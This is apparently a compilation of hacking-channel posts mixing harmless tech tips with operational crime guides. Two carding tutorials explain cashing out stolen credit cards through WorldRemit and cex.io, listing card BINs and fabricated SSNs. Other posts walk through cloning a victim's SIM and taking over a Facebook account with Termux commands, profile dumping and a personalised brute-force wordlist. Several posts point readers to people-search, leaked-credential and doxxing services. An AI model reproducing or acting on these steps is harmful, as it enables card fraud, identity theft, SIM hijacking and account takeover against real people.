What's a LAMP, and why does it matter

 

Download Now


Enjoy! Follow us for more...

Installing Eclipse for C_C++ development

 

Download Now


Enjoy! Follow us for more....

What is GIS ?

 

Download Now


Enjoy! Follow us for more...

Understanding Windows Azure

 

Download Now


Enjoy! Follow us for more....

Virtual servers (EC2) and Elastic IP

 

Download Now


Enjoy! Follow us for more...

Installing the DebugKit plugin for development

 

Download Now


Enjoy! Follow us for more...

Setting up the Visual Studio and Azure Mobile Services SDK development tools

 

Download now

Enjoy! Follow us for more...


Installing Git on Windows

 


Download Now

Enjoy! Follow us for more

What is Google App Engine.

 

Download Now

Enjoy! Follow us for more...



Developing UI for Apple Watch

 


Download Now

Enjoy! Follow us for more...

Top Five Ways to Reduce Your Digital Footprint


💚1 - Delete or Deactivate Old Shopping & Social Network Accounts. .


💚2 - Use Stealth or Incognito Mode – or Even Tor. ..


💚3 - Don't Click on Daft surveys


💚4 - Check Your Privacy Settings. ...


💚5 - Add Extensions or Plug-Ins.


Enjoy! Follow us for more...

Get Any Person Details In Usa


This Tutorial Will Guide U To Get Info About The People Living In City..😍


Steps:--

Step 1 - Go To Below Site..

https://www.truepeoplesearch.com/

Step 2 - Then Enter The Name Of Person U Want Info.. Full Name..

Step 3 - Enter The City In Which He/She Lives..

Step 4 - Click On Enter And Complete The Human Captcha..

Step 5 - Site Will Show Many Results Just Choose Whom Details U Want..

Step 6 - After Choosing U Get There Phn Number, Email, Address And Any Other Details..


Enjoy! Follow us for more...

WORLDREMIT carding tutorial

Hello everyone, drove another CC cashout method method from our regular customer. IMPORTANT! The information which is written in this article does not give a 100% guarantee of the result, but is only of an introductory nature.

So, you will need:

1. REMOTE DESKTOP CONNECTION (RDP)

2. CREDIT CARD(СС)

3.RIGHT PHONE NUMBER

Cashout Method (First Method)

First you need to buy an old World Remit account 


1. You need to buy a MOP with Info (Must be a phone number)

2. You will need the correct phone number, as in info CC.

3. Create a Yahoo or Gmail email address named CC

4. Go to WORLDREMIT.COM

5. Sign in to the old account you bought

6. After logging in, go to Options -> Send Money -> Select the state to which you want to send money

7. Choose one of the options.

8. Mobile money option / airtime option / money withdrawal.

9. Choose any and place an order as you fill in the order for the store ..

10.They will request a phone number, after which you will enter a valid number. 11.After you fill in the recipient data with your own data, you click the Submit button. This is often shortened to bill-ship.

Second Method

1. Or get Vpn on your phone

2. Download the WorldRemit app

3. Not VBV card, preferably 414720

4. Create an account

5. After creating an account, go to

6. Options -> Send Money -> Select the state to which you want to send money

7. Select one of the options.


8. Mobile money option / airtime option / cash out.

9. Select any and place an order as if you are filling out an order for a store.

10. They will ask for a phone number, after which you will enter a valid number.

11. After you fill in the recipient's data with your own data, you click the Submit button.


Enjoy! Follow us for more...

BUG BOUNTY TIPS


 *Tip #1* 


Use GIT as a recon tool. Find the target's GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.


Link : https://gist.github.com/EdOverflow/a9aad69a690d97a8da20cd4194ca6596


 *Tip #2* 


Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to /explore. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.


 *Tip #3* 


Bug bounty tip: test applications of a company that costs money or requires manual setup. Chances are only few to none would have tested it leaving it vulnerable.


 *Tip #4* 


If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO.


 *Tip #5* 


Look for hackathon-related assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times.


 *Tip #6* 


Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports// | grep INSTALL.mysql.txt | grep 200 | less)/


 *Tip #7* 


When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. For example, demonstrating a CSRF can be exploited simply by using [img] tag is better than having to send a link to the victim.


Enjoy! Follow us for more...

The Filesystem Hierarchy Standard (Cheat-Sheet)

This is a snippet from the Kali Linux Revealed E-Book but good for beginners in Linux to learn the File System Hierarchy


• /bin/: basic programs

• /boot/: Linux kernel and other files required for its early boot process

• /dev/: device files

• /etc/: configuration files

• /home/: user’s personal files

• /lib/: basic libraries

• /media/: mount points for removable devices (CD/DVD-ROM, USB keys, and so on)

• /mnt/: temporary mount point

• /opt/: extra applications provided by third parties

• /root/: administrator’s (root’s) personal files

• /run/: volatile runtime data that does not persist across reboots (not yet included in the FHS)

• /sbin/: system programs

• /srv/: data used by servers hosted on this system

• /tmp/: temporary files (this directory is often emptied at boot)

• /usr/: applications (this directory is further subdivided into bin,sbin,lib according to the same logic as in the root directory) Furthermore,/usr/share/ contains architecture-independent data. The /usr/local/ directory is meant to be used by the administrator for installing applications manually without overwriting files handled by the packaging system(dpkg).

• /var/: variable data handled by services. This includes log files, queues, spools, and caches.

• /proc/ and /sys/ are specific to the Linux kernel (and not part of the FHS). They are used by the kernel for exporting data to user space.


Enjoy! Follow us for more...

How to protect website been hacked


Using Firewall : Firewall may be accustomed drop traffic from suspicious information processing address if attack may be an easy DOS


Encrypting the Cookies : Cookie or Session poisoning may be prevented by encrypting the content of the cookies, associating cookies with the consumer information processing address and temporal arrangement out the cookies once it slow


Validating and confirmative user input : This approach is prepared to stop the type tempering by confirmative and verifying the user input before processing it


Header Sanitizing and validation : This technique is beneficial against cross website scripting or XSS, this method includes verifying and sanitizing headers, parameters passed via the address, type parameters and hidden values to cut back XSS attacks.


What are the tools used for ethical hacking?🛑


There are several moral hacking tools out there within the marketing for different purposes, they are:


NMAP – NMAP stands for Network plotter. It’s associate degree open source tool that’s used wide for network discovery and security auditing.


Metasploit – Metasploit is one amongst the most powerful exploit tool to conduct basic penetration tests.


Burp Suit – Burp Suite could be a widespread platform that’s widely used for playing security testing of internet applications.


Angry IP Scanner – Angry information processing scanner could be a light-weight, cross-platform information processing address and port scanner.


Cain & Abel – Cain & Abel is a password recovery tool for Microsoft operational Systems.


Ettercap – Ettercap stands for local area network Capture. It is used for Man-in-the-Middle attack using a network security tool.



What is Burp Suite? What are the tools does it contain?🛑


Burp Suite is an integrated platform used for attacking net applications. It contains all the tools a hacker would need for attacking any application. a number of these functionalities are


Proxy


Spider


Scanner


Intruder


Repeater


Decoder


Comparer


Sequencer



Type of sql injection Error-based SQL injection🛑


Blind SQL injection


Time-based SQL injection




Enjoy! Follow us for more...

Common Types Of Trojan Malware, From A to Z


Here’s a look at some of the most common types of Trojan malware, including their names and what they do on your computer:


Backdoor Trojan

━━━━━━━━━━━━━

This Trojan can create a “backdoor” on your computer. It lets an attacker access your computer and control it. Your data can be downloaded by a third party and stolen. Or more malware can be uploaded to your device.


Distributed Denial of Service (DDoS) attack Trojan

━━━━━━━━━━━━━

This Trojan performs DDoS attacks. The idea is to take down a network by flooding it with traffic. That traffic comes from your infected computer and others.


Downloader Trojan

━━━━━━━━━━━━━

This Trojan targets your already-infected computer. It downloads and installs new versions of malicious programs. These can include Trojans and adware.


Fake AV Trojan

━━━━━━━━━━━━━

This Trojan behaves like antivirus software, but demands money from you to detect and remove threats, whether they’re real or fake.


Game-thief Trojan

━━━━━━━━━━━━━

The losers here may be online gamers. This Trojan seeks to steal their account information.


Infostealer Trojan

━━━━━━━━━━━━━

As it sounds, this Trojan is after data on your infected computer.


Mailfinder Trojan

━━━━━━━━━━━━━

This Trojan seeks to steal the email addresses you’ve accumulated on your device.


Ransom Trojan

━━━━━━━━━━━━━

This Trojan seeks a ransom to undo damage it has done to your computer. This can include blocking your data or impairing your computer’s performance.


Remote Access Trojan

━━━━━━━━━━━━━

This Trojan can give an attacker full control over your computer via a remote network connection. Its uses include stealing your information or spying on you.


Rootkit Trojan

━━━━━━━━━━━━━

A rootkit aims to hide or obscure an object on your infected computer. The idea? To extend the time a malicious program runs on your device.


SMS Trojan

━━━━━━━━━━━━━

This type of Trojan infects your mobile device and can send and intercept text messages. Texts to premium-rate numbers can drive up your phone costs.


Trojan banker

━━━━━━━━━━━━━

This Trojan takes aim at your financial accounts. It’s designed to steal your account information for all the things you do online. That includes banking, credit card, and bill pay data.


Trojan IM

━━━━━━━━━━━━━

This Trojan targets instant messaging. It steals your logins and passwords on IM platforms.


That’s just a sample. There are a lot more.




Enjoy! Follow us for more...

HOW TO CHANGE YOUR IP IN 1 MINUTE

 🔰🔰


●1. ᴄʟɪᴄᴋ ᴏɴ "sᴛᴀʀᴛ" ɪɴ ᴛʜᴇ ʙᴏᴛᴛᴏᴍ ʟᴇғᴛ ʜᴀɴᴅ ᴄᴏʀɴᴇʀ ᴏғ sᴄʀᴇᴇɴ

●2. ᴄʟɪᴄᴋ ᴏɴ "ʀᴜɴ"

●3. ᴛʏᴘᴇ ɪɴ "ᴄᴏᴍᴍᴀɴᴅ" ᴀɴᴅ ʜɪᴛ ᴏᴋ

ʏᴏᴜ sʜᴏᴜʟᴅ ɴᴏᴡ ʙᴇ ᴀᴛ ᴀɴ ᴍsᴅᴏs ᴘʀᴏᴍᴘᴛ sᴄʀᴇᴇɴ.

●4. ᴛʏᴘᴇ "ɪᴘᴄᴏɴғɪɢ /ʀᴇʟᴇᴀsᴇ" ᴊᴜsᴛ ʟɪᴋᴇ ᴛʜᴀᴛ, ᴀɴᴅ ʜɪᴛ "ᴇɴᴛᴇʀ"

●5. ᴛʏᴘᴇ "ᴇxɪᴛ" ᴀɴᴅ ʟᴇᴀᴠᴇ ᴛʜᴇ ᴘʀᴏᴍᴘᴛ

●6. ʀɪɢʜᴛ-ᴄʟɪᴄᴋ ᴏɴ "ɴᴇᴛᴡᴏʀᴋ ᴘʟᴀᴄᴇs" ᴏʀ "ᴍʏ ɴᴇᴛᴡᴏʀᴋ ᴘʟᴀᴄᴇs" ᴏɴ ʏᴏᴜʀ ᴅᴇsᴋᴛᴏᴘ.

●7. ᴄʟɪᴄᴋ ᴏɴ "ᴘʀᴏᴘᴇʀᴛɪᴇs"

ʏᴏᴜ sʜᴏᴜʟᴅ ɴᴏᴡ ʙᴇ ᴏɴ ᴀ sᴄʀᴇᴇɴ ᴡɪᴛʜ sᴏᴍᴇᴛʜɪɴɢ ᴛɪᴛʟᴇᴅ "ʟᴏᴄᴀʟ ᴀʀᴇᴀ ᴄᴏɴɴᴇᴄᴛɪᴏɴ", ᴏʀ sᴏᴍᴇᴛʜɪɴɢ ᴄʟᴏsᴇ ᴛᴏ ᴛʜᴀᴛ, ᴀɴᴅ,

ɪғ ʏᴏᴜ ʜᴀᴠᴇ ᴀ ɴᴇᴛᴡᴏʀᴋ ʜᴏᴏᴋᴇᴅ ᴜᴘ, ᴀʟʟ ᴏғ ʏᴏᴜʀ ᴏᴛʜᴇʀ ɴᴇᴛᴡᴏʀᴋs.

●8. ʀɪɢʜᴛ ᴄʟɪᴄᴋ ᴏɴ "ʟᴏᴄᴀʟ ᴀʀᴇᴀ ᴄᴏɴɴᴇᴄᴛɪᴏɴ" ᴀɴᴅ ᴄʟɪᴄᴋ "ᴘʀᴏᴘᴇʀᴛɪᴇs"

●9. ᴅᴏᴜʙʟᴇ-ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ "ɪɴᴛᴇʀɴᴇᴛ ᴘʀᴏᴛᴏᴄᴏʟ (ᴛᴄᴘ/ɪᴘ)" ғʀᴏᴍ ᴛʜᴇ ʟɪsᴛ ᴜɴᴅᴇʀ ᴛʜᴇ "ɢᴇɴᴇʀᴀʟ" ᴛᴀʙ

●10. ᴄʟɪᴄᴋ ᴏɴ "ᴜsᴇ ᴛʜᴇ ғᴏʟʟᴏᴡɪɴɢ ɪᴘ ᴀᴅᴅʀᴇss" ᴜɴᴅᴇʀ ᴛʜᴇ "ɢᴇɴᴇʀᴀʟ" ᴛᴀʙ

●11. ᴄʀᴇᴀᴛᴇ ᴀɴ ɪᴘ ᴀᴅᴅʀᴇss (ɪᴛ ᴅᴏᴇsɴ'ᴛ ᴍᴀᴛᴛᴇʀ ᴡʜᴀᴛ ɪᴛ ɪs. ɪ ᴊᴜsᴛ ᴛʏᴘᴇ 1 ᴀɴᴅ 2 ᴜɴᴛɪʟ ɪ ғɪʟʟ ᴛʜᴇ ᴀʀᴇᴀ ᴜᴘ).

●12. ᴘʀᴇss "ᴛᴀʙ" ᴀɴᴅ ɪᴛ sʜᴏᴜʟᴅ ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ ғɪʟʟ ɪɴ ᴛʜᴇ "sᴜʙɴᴇᴛ ᴍᴀsᴋ" sᴇᴄᴛɪᴏɴ ᴡɪᴛʜ ᴅᴇғᴀᴜʟᴛ ɴᴜᴍʙᴇʀs.

●13. ʜɪᴛ ᴛʜᴇ "ᴏᴋ" ʙᴜᴛᴛᴏɴ ʜᴇʀᴇ

●14. ʜɪᴛ ᴛʜᴇ "ᴏᴋ" ʙᴜᴛᴛᴏɴ ᴀɢᴀɪɴ

ʏᴏᴜ sʜᴏᴜʟᴅ ɴᴏᴡ ʙᴇ ʙᴀᴄᴋ ᴛᴏ ᴛʜᴇ "ʟᴏᴄᴀʟ ᴀʀᴇᴀ ᴄᴏɴɴᴇᴄᴛɪᴏɴ" sᴄʀᴇᴇɴ.

●15. ʀɪɢʜᴛ-ᴄʟɪᴄᴋ ʙᴀᴄᴋ ᴏɴ "ʟᴏᴄᴀʟ ᴀʀᴇᴀ ᴄᴏɴɴᴇᴄᴛɪᴏɴ" ᴀɴᴅ ɢᴏ ᴛᴏ ᴘʀᴏᴘᴇʀᴛɪᴇs ᴀɢᴀɪɴ.

●16. ɢᴏ ʙᴀᴄᴋ ᴛᴏ ᴛʜᴇ "ᴛᴄᴘ/ɪᴘ" sᴇᴛᴛɪɴɢs

●17. ᴛʜɪs ᴛɪᴍᴇ, sᴇʟᴇᴄᴛ "ᴏʙᴛᴀɪɴ ᴀɴ ɪᴘ ᴀᴅᴅʀᴇss ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ"

ᴛᴏɴɢᴜᴇ.ɢɪғ 18. ʜɪᴛ "ᴏᴋ"

●19. ʜɪᴛ "ᴏᴋ" ᴀɢᴀɪɴ

●20. ʏᴏᴜ ɴᴏᴡ ʜᴀᴠᴇ ᴀ ɴᴇᴡ ɪᴘ ᴀᴅᴅʀᴇss



Enjoy! Follow us for more...

MAKE GMAIL ACCOUNT WITHOUT NUMBER

 


On PC : (Less chance to work)


First, put on 3G, 4G, or LTE on your phone and make a wifi hotspot from your phone.


On your PC, connect to the hotspot of your phone and start a browser you do not use often.


Open a new incognito tab


Go to gmail.com, create an account.


Enter a first and last name that exists.


The Gmail email need to be named FIRSTNAMELASTNAME@gmail.com


If it's already used add some random numbers at the end


For the password, use a shitty pass like FIRSTNAME1998


For the first try, you have to not type the correct password in the second textbox and click on submit


The site will say "The password in the verification box is incorrect"


You just have to click on see the password in clear and retype it on the verification textbox


Click on submit and done! You made an account and google will not ask any SMS verification


=================================


On Mobile : (Works 99% of the time)


First, disconnect from your wifi and switch to 3G, 4G, or LTE


Start a browser (Google Chrome recommended)


Open a new incognito tab


Go to gmail.com, create an account.


Enter a first and last name that exists.


The Gmail email need to be named FIRSTNAMELASTNAME@gmail.com


If it's already used add some random numbers at the end


For the password, use a shitty pass like FIRSTNAME1998


For the first try, you have to not type the correct password in the second textbox and click on submit


The site will say "The password in the verification box is incorrect"


You just have to click on see the password in clear and retype it on the verification textbox


Click on submit and done! You made an account and google will not ask any SMS verification


Enjoy! Follow us for more...

CC to BTC Full Method :- Pro Carders Only


site : cex.io

TIPS : USE VPN / PRIVATE PROXY USA TO CARD THE SITE 


BINS WORKING GOOD : 

410039/483313/426684/441712481583/426684/480365/427138/432630/438852 @330424

1) Go to site : cex.io

2) Register for an account with an free email from 10minutemail.net

3) After you did the account on the site go verify the account with email

4) You have to fund your account with money from credit cards you have public or private works both

5) Click on Deposit and you will be redirected to payment option

6) In this page you have to put the money you want to deposit and info from credit card you have 

7) Then fill the billing and other sections with fake info's from this site : fakenamegenerator.com

8) For SSN section you have to do simple things 

9) In fakenamegenerator.com site you have on fake info's a section that is SSN

10) You take that 317-66-XXXX and where it's X letter you put 4 random numbers it doesn't count 

11) If you want to be more sure i have those sites that help you to get SSN and help you to get a verified SSN


SITES FOR SSN VERIFICATION : 

http://www.ssnvalidator.com/

https://www.ssn-check.org/recent/

https://www.ssn-verify.com/bulk-veri...ck.org&pos=top

http://www.searchbug.com/peoplefinde...-ssn-free.aspx


12) After that click PROCEED and there you go 

13) Your account will be funded with 50$ from that credit card you got from altenen public or private from shops 

14) Now you go to home page and click on BUY/SELL

15) You have options of buying bitcoins worth : 100$ / 200$ / 500$ / 1,000$ 

16) Go down side of page and put your amount like 50$

17) Now click buy and they will take that 50$ from your balance account and will give you bitcoins

18) You will get bitcoins in account and go and click on WITHDRAW

19) Click on BTC to be payed in BITCOINS

20) Put your BTC WALLET and put amount you want to withdraw 

21) After click on Withdraw button and the bitcoins will be transferred instant to your address



Enjoy! Follow us for more...

How To Duplicate SIM Card To Use On Two Phones



Things Required To Clone A SIM Card:

🔅Blank Programmable SIM Card: I got this one from Amazon, you can also buy one on eBay

🔅A SIM Firmware Reader/Writer: I also got this on Amazon, but it’s available on eBay also. (Or For an Indian sim you can get it from his Authorised store.


Download and install: MagicSIM

Download and install: USB SIM Card Reader

Access to the victim’s SIM for about 15 to 20 minutes.


Let’s get started cloning SIM card.


Step 1: Remove the SIM from the phone, place it in the card reader, click read from the card in magic SIM.

When it displays ‘connected’, select crack SIM in the toolbar.


Step 2: Click strong KI and select all of the other find options and then click start.

Once your KI is found and the crack is finished, click the file, save as and save your cracked SIM info to a file.


Step 3: You must click disconnect from the file menu or you will ruin your SIM card. [Important, Otherwise SIM will crack]


Step 4: Once it says disconnected. Remove the SIM. Put the SIM in your phone and see if it still works, it should.

(If not, either you did not unlock your SIM, or you tried to copy it instead of crack and save.)

Unlock SIM Card

Go to phone tools, select SIM card, then select unlock SIM, it will prompt for a code.

Call network provider, they will ask for your phone number, your account info, name, and security code, then they will ask why you want to unlock your SIM card, just tell them you need to unlock your SIM to get it to work with your overseas phone or something.

Once they give you the SIM unlock code, enter it, and it will say SIM unlocked.


Step 5: Insert blank SIM card and open USB SIM Card Reader Software not magic SIM at this point.


Step 6: Click connect. It should say ‘No Info Found’ if it is truly blank.


Step 7: Select write to SIM, it will prompt you to select a .dat file, select the one you saved earlier.


Step 8: Now click start, it will take about 10 minutes to write it, once it is complete, it will ask for a security code, enter the security code the network provider gave you, then click Finish.

DONE: You have successfully cloned a SIM Card.


Enjoy! Follow us for more...

Top 3 Most used methods of Cracking Passwords

Dictionary Attack

👉 A dictionary attack is a technique used by most regular hackers to determine the passphrase by trying their luck many times. Unlike its name, it works like a dictionary consisting of usual words that many people use as their password. On Dictionary attacks, hackers attempt to crack your passwords by making random guesses.


🔹 Brute Force Attack

👉 Well, Brute-Force is an advanced version of Dictionary attack. In this attack, the hacker submits many passwords or passphrases with the hope of eventually guessing correctly. The attacker’s role is to systematically check all possible passwords and passphrases until the correct one is found.


🔹 Rainbow Table Attack

👉 Well, Rainbow Table is usually a large dictionary that contains loads of pre-calculated hashes and the passwords from which they were calculated. The major difference between Rainbow and other dictionary attacks is the Rainbow table is specially optimized for hashes and passwords


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Enjoy! Follow us for more...

How To Bypass Captcha | 100% Working Method

   

1:- Add Buster Extension To Chrome 


2:- Go To Captcha.


3:- Click The Tick ✔️ Mark Under The Captcha.


4:- The Captcha Will Be Solved Automatically.


LINK -https://chrome.google.com/webstore/detail/buster-captcha-solver-for/mpbjkejclgfgadiemmefgebjfooflfhl?hl=en


Enjoy! Follow us for more...

OSINT Tips


◾ Email Search Thread◾

1. http://haveibeenpwned.com — check in leaked databases


2. http://emailrep.io — find websites where account has been registered by email


3. http://dehashed.com — checking mail in leaked databases



4. @Smart_SearchBot (Telegram) — find full name, DoB, address and phone number


5. http://pwndb2am4tzkvold.onion — search in pwndb, also search by password


6. http://intelx.io — will find email addresses, domains, URLs, IP addresses, CIDR, bitcoin addresses, IPFS hashes, etc


7. @mailsearchbot — search in database, gives password partially


8. @info_baza_bot — show from what base mail leaked, 2 free scans


9. http://leakedsource.ru —  show from what base mail leaked


10. http://mostwantedhf.info — find skype account


11. @email2phonenumber (Telegram) — automatically collects data from account recovery pages, and finds the phone number


12. http://spiderfoot.net — automatic search using a huge number of methods, tool available in the cloud with registration


13. http://reversegenie.com — find location, first letter of the name and phone numbers 


14. @last4mailbot (Telegram) — bot will find the last 4 digits of the Sberbank client’s phone number


15. http://searchmy.bio — find instagram account with email in description


16. email-osint-ripper https://github.com/Quantika14/email-osint-ripper


17. Amazing OSINT bot  (http://t.me/howtofind_bot)


18. http://domainbigdata.com find websites where the account has been registered by email and phone number and name


19. http://search.carrot2.org — cluster search engine, identifies objects or categories associated with the word in the search query


20. http://boardreader.com — search engine on forums


21. http://searchcode.com — search by code in open web


22. http://swisscows.com — semantic search engine


23. http://publicwww.com — search by source page code, you can search for nicknames, mail, trackers, wallets, website addresses, etc


24. http://kribrum.io — social-media search engine



Enjoy! Follow us for more...

How To Remove Pattern On Android Without Factory Reseting


Unlock Locked Pattern Without Losing Data! 


Requirements: Aroma File Manager +A memory card for device


+Your android device must be either locked by pattern lock or password lock.


How To Do it (Procedure) ❓


1. After you download “Aroma File Manager” place it in your card [SD CARD] Insert card into your locked android device.


2. Open Stock Recovery Mode by rebooting your android device and pressing PowerKey and VolumeUp key simultaneously. Different phones may have different methods to open stock recovery mode, so if you face any problems comment and i will give you the solution.


3. After entering into recovery mode use volume+ and volume- buttons to scroll up and down.For select use power button or home button.


4. From there click on “Install zip from SD Card” and navigate to where you placed “Aroma File Manager” click and install it.


5. After installing, it will open in recovery mode.


6. From the “Aroma File Manager” navigate to settings>>go to bottom and click on “Automount All Devices On Start” and then exit.


7. Repeat step 4&5 again.


8. After this you will get “Aroma File Manager” opened again.


9. Now navigate to Data Folder>>System Folder and Find >>”gesture.key” or “password.key” for pattern lock or password lock respectively.


10. Delete that any one file and then exit “Aroma File Manager” and reboot your device. After rebooting you will notice that password or pattern will not be removed yet. But don’t worry draw any random pattern your device will unlock but remember that pattern.


Enjoy! Follow us for more...

LIST OF 100 GB+ FREE CLOUD STORAGE [ UPDATED LIST APRIL 2020 ]


Sign up at Yunpan.360.cn to get 360GB of free storage. (can be extended up to 36TB by downloading the PC and Android/iOS clients)


Sign up at Ozibox.com to get 100GB of free storage.


Sign up at SurDoc.com to get 100GB of free storage.


Sign up at Shared.com to get 100GB of free storage.


Sign up at Adrive.com to get 50GB of free storage


Sign up at Mega.co.nz to get 50GB of free storage.


Sign up at Hubic.com to get 25GB of free storage.


Sign up at Firedrive.com to get 20GB of free storage.


Sign up at Onedrive.live.com to get 15GB of free storage.


Sign up at Copy.com to get 15GB of free storage.


Sign up at Mediafire.com to get 10GB of free storage. (40GB more available with other activities)


Sign up at Pcloud.com to get 10GB of free storage (10GB more available with other activities)


Sign up at Box.com to get 10GB of free storage.


Join:-- https://t.me/retr0sapiensD


For Discussion with many other Penetesters!!✌🏻


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Enjoy! Follow us for more...

How To Remove All Viruses From Computer Using Rescue USB Disk

 

 Today, we are going to share a few best methods to create a bootable USB of antivirus. So have a look at the complete steps discussed below.


🔹Step 1: First of all, connect a removable USB device to your computer.


🔹Step 2: Now you need, to download the ISO image of Kaspersky Rescue Disk.


🔹Step 3: Now follow the instructions given by Kaspersky to create a USB bootable Rescue disk.


🔹Step 6: Now Restart the computer with USB inserted and press F11 when the computer started to boot your USB.


🔹Step 7: Now Kaspersky interface will appear, proceed till you find the option to select from Graphic mode or Text mode, select the graphic mode.


🔹Step 8: Once Graphical User Interface fully loads onto the screen, you can perform a scan and remove all detected threats.


Enjoy! Follow us for more...

How to Recover Data From Corrupted OS

   ⚜️ We are going to use EaseUS data recovery to recover data from a crashed operating system. The software is mainly designed for data recovery cases of any operating system crash. 


🔹Step 1: First of all, launch EaseUS data recovery on a working computer. Select ‘USB Drive’ from the list and click on ‘Proceed’. Wait for few minutes until EaseUS data recovery creates a WinPE bootable disk.


🔹Step 2: Once done, connect the bootable disk to the PC with the corrupted Windows system files. Restart the PC and press F2 during the start. This will run the EaseUS data recovery on the startup.


🔹Step 3: Now it will show you the disk partitions. Select the disk where you want to recover data and then click on the ‘Scan’ button.


🔹Step 4: Now, wait for a few minutes until the tool scans for the available data. Once done, it will list all file types that can be recovered.


🔹Step 5: You can either choose to preview or click on the ‘Recover’ button to save the file. Make sure to choose a different drive or different USB to save the file.


Enjoy! Follow us for more...

Reverse Engineering Content

 

Download now


Enjoy! Follow us for more...

How to Setup a testing server (Mac)

 

Download now


Enjoy! Follow us for more...

Hide data in an audio file


Hello my little Freaks. We  looked at a method for hiding files in a picture, and this time we will show you a method for hiding data in audio files.


 Let's get started:


 1. Download and install DeepSound - http://jpinsoft.net/DeepSound/Download.aspx


 2. Open the program and click on "Open carrier files", then specify the path where the audio file is stored, where the information will be hidden.


 3. Click on "Add secret files" and select the required data.


 4. Next click on "Encode secret files".


 The files were hidden in the "music".  In order to get them out of there, on the main page of the program, add the audio file in which the data was encrypted and click on "Extract secret files".


 Done!  Now you know another method for storing important information securely.



Enjoy! Follow us for more...

How to Enable Reputation-Based Protection in Windows 10

 According to Microsoft, ‘Reputation Based Protection’ can help protect your PC from potentially unwanted applications. Once enabled, it will automatically block apps and downloads that it feels to be malicious or might cause unexpected behaviors. This article will share a detailed guide on how to protect your Windows 10 computer from Potentially unwanted applications. 


🔹Step 1: First of all, click on the Start button and select ‘Settings.’


🔹Step 2: On the Settings app, click on the ‘Update & Security.’


🔹Step 3: Next, select ‘Windows Security’ from the left side pane.


🔹Step 4: From the list of options, click on ‘App & browser control.’


🔹Step 5: Now on the ‘Reputation-based protection’ section, click on the ‘Turn on’ button.


🔹Step 6: Next, click on the ‘Reputation-based protection settings.’


🔹Step 7: Scroll down and enable the ‘Potentially unwanted app blocking’ and enable the ‘Block apps’, and ‘Block downloads’ option.


Enjoy! Follow us for more...

How to Change/spoof IP Addresses in Linux


✳️ Changing/spoofing IP addresses can be fairly simple in Linux. Remember that in most cases, you're going to have a dynamically assigned address from a DHCP server. In some cases, you may need to reassign the address, especially if you're hacking. This can be useful in spoofing your IP address, making network forensics more challenging, but certainly not impossible.


✅ We can do this by using the ifconfig command with the interface we want to assign the IP to and the IP address we want. Such as:


🔹 ifconfig eth0 192.168.1.115


✅ Now, when we type *ifconfig** , we can see that our IP address has changed to the new IP address.


✅ We can also change the netmask and broadcast address, if necessary, such as:


🔹ifconfig eth0 192.168.1.115 netmask 255.255.255.0 broadcast 192.168.1.255 


Enjoy! Follow us for more...





Create Animating the text and rule

 

Download now

Enjoy! Follow us for more...

Use Social Info to find information about social media accounts

 

Download now

Enjoy! Follow us for more...

Buy Bitcoin With Credit Card And Debit Card

 💰


Ⓜ️Steps -


Step 1 - Go To SportsBet.io


Step 2 - Signup For A New Account..


Step 3 - Click On +Deposit


Step 4 - Go To Buy Btc And Enter The Amount U Wish To Buy Btc..


Step 5 - It Will Ask For Card Details And Billing Address..


Step 6 - Wait 48Hrs To Get Your Btc Deposited In Your Account..


Step 7 - As Btc Get Deposited Transfer The Btc To Your Btc Address..


Enjoy! Follow us for more...

HOW TO HACK A FACEBOOK ACCOUNT


Requirements:

- Termux

- 200 MB space

- Facebook target link

- Info about target

- Root


Setup:

$ apt install nodejs -y


$ pkg install git tsu -y


$ apt install python python2 -y


$ apt update; apt upgrade -y


$ npm install --global facebook-id-of


1️⃣ Getting ID


The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.


On the target profile, we can see URL like this:

https://www.facebook.com/michael.schmidt.7965692 — Remove the hyperlink and copy online name after facebook.com/.


$ facebook-id-of michael.schmidt.7965692


› Facebook ID of michael.schmidt.7965692 is 671393100


2️⃣ Dumping Information About Target


For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.


$ pkg update upgrade


$ pkg install git python2


$ git clone https://github.com/ciku370/OSIF


$ cd OSIF


$ pip2 install -r requirements.txt


For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. (TARGET MUST EXIST IN FRIEND LIST)


$ python2 osif.py

D3b2y >> token

Type username (email) & Password.


D3b2y >> cat_token

[*]Your access token !!


Setup done now  Hype


D3b2y >> dump_id

D3b3y >> dump_671393100


This fetching some informations about our target an example can be found here:


https://pastebin.com/10H7C22T


If you know your targets e-mail, it's much easier to attack them from the »bruteforce« tool.


D3b3y » dump_mail


Now on to creating a wordlist for bruteforcing


While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.


$ git clone https://github.com/Mebus/cupp.git; cd cupp/


$ python3 cupp.py -i


After tool has been started, fill out the information which you have dumped with OSIF.

It's asking :

> Do you want to add some key words about the victim? Y/[N]: y


> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson


> Do you want to add special chars at the end of words? Y/[N]: n


> Do you want to add some random numbers at the end of words? Y/[N]:y


> Leet mode? (i.e. leet = 1337) Y/[N]: y


$ cp -R test.txt $HOME


Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.

These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.


